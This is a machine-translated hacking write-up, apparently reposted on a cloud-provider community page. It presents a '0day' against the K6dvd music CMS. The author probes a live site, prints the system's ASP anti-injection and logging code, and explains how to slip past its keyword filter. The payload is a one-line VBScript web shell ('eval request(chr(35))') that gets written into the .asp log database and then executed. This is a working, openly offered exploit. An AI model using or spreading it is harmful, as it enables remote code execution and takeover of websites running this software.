K6dvd Music Network 0day (injection prevention embarrassment)

Source: Internet
Author: User
Tags servervariables

I haven't read the code for a long time ~ I believe many predecessors have known this BUG before posting it !! Ps: although I have never found it, it may have been too long to pay attention to the network! Ah ~~

K6dvd is a good music publishing Management System in China!

Today, Yu asked me to publish some penetration articles for your discussion this week !~ This is a denial, because it has not been infiltrated for a while, so there is nothing to write! But I still randomly flipped through some sites to see if I can get some cainiao penetration articles...

Find a music publishing station! The URL is no longer intended for penetration ~ Oh!

If you submit a URL with parameters, the following result is returned:

Well, anti-injection system! Most people who are engaged in penetration should have seen it ~

Illegal operation! The system makes the following records:
Operation IP: xxx. xx
Operation Time: 19:33:47
Operation page:/yxplay. asp
Submission method: GET
Submit parameter: id
Data submission: 109446

Oh, I also made an IP record ~~

I tried some common penetration ideas at Will ~ It is not satisfactory because of the blockage of the anti-injection system! Therefore, I directly downloaded the music source code of the site to see if I could turn over the ODAY ~ So we have this article !!

Let's take a look at the injection prevention system, which exists in conn. asp and SQL. asp, as shown in the following section:

Dim dbkillSql, killSqlconn, connkillSql
DbkillSql = "data/# SQL. asp"
On Error Resume Next
Set killSqlconn = Server. CreateObject ("ADODB. Connection ")
ConnkillSql = "Provider = Microsoft. Jet. OLEDB.4.0; Data Source =" & Server. MapPath (dbkillSql)
KillSqlconn. Open connkillSql

A database connection is created!
-------- POST part ------------------
If Request. Form <> "" Then
For Each Fy_Post In Request. Form
For Fy_Xh = 0 To Ubound (Fy_Inf)
If Instr (LCase (Request. Form (Fy_Post), Fy_Inf (Fy_Xh) <> 0 Then
If WriteSql = True Then
KillSqlconn. execute ("insert into 9j455 (Sqlin_IP, SqlIn_Web, SqlIn_FS, SqlIn_CS, SqlIn_SJ) values (" & Request. serverVariables ("REMOTE_ADDR") & "," & Request. serverVariables ("URL") & ", POST," & Fy_Post & "," & replace (Request. form (Fy_Post ),"","")&")")
KillSqlconn. close
Set killSqlconn = Nothing
End If
Response. Write "<Script Language = JavaScript> alert (Happy audio/video entertainment network prompts you, please do not submit any illegal characters or parameters to this site to try to inject !); </Script>"
Response. Write "illegal operation! The system makes the following records: <br>"
Response. Write "Operation IP:" & Request. ServerVariables ("REMOTE_ADDR") & "<br>"
Response. Write "operation time:" & Now & "<br>"
Response. Write "Operation page:" & Request. ServerVariables ("URL") & "<br>"
Response. Write "submission method: POST <br>"
Response. Write "Submit parameters:" & Fy_Post & "<br>"
Response. Write "submit data:" & Request. Form (Fy_Post)
Response. End
End If

Well, this is the alert error message!

Take a closer look and find an interesting guy, killSqlconn. execute ("insert into 9j455 (Sqlin_IP, SqlIn_Web, SqlIn_FS, SqlIn_CS, SqlIn_SJ) values (" & Request. serverVariables ("REMOTE_ADDR") & "," & Request. serverVariables ("URL") & ", POST," & Fy_Post & "," & replace (Request. form (Fy_Post ),"","")&")")

This is a normal record of the IP and action types, as well as the content submitted by the injector !! Look at the above Server. CreateObject ("ADODB. Connection") database turned out to be ASP... Then, if we submit <% execute (request ("wooden") %>, won't we write a sentence to # SQL. asp? Don't be too happy. Let's look at it again:

Customize the string to be filtered, separated by "|"
Fy_In = "|; | and | exec | insert | select | delete | update | count | * | % | chr | mid | master | truncate | char | declare"

The keyword in the submit type is executed in the fy_in parameter! If these keywords appear in the submitted content, you cannot submit them to the database!

If you have learned regular expressions, this is not a problem for JavaScript masters. It has been changed over and over again! Finally, a Trojan that can skip all the above detection statements is born ~ It's just the pleasure of eval---No execute error!

<Script runat = server language = vbscript> eval request (chr (35) </script>



Method of exploits: and => <script runat = server language = vbscript> eval request (chr (35) </script>

Then access data/% 23sql. asp to execute a sentence:



Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.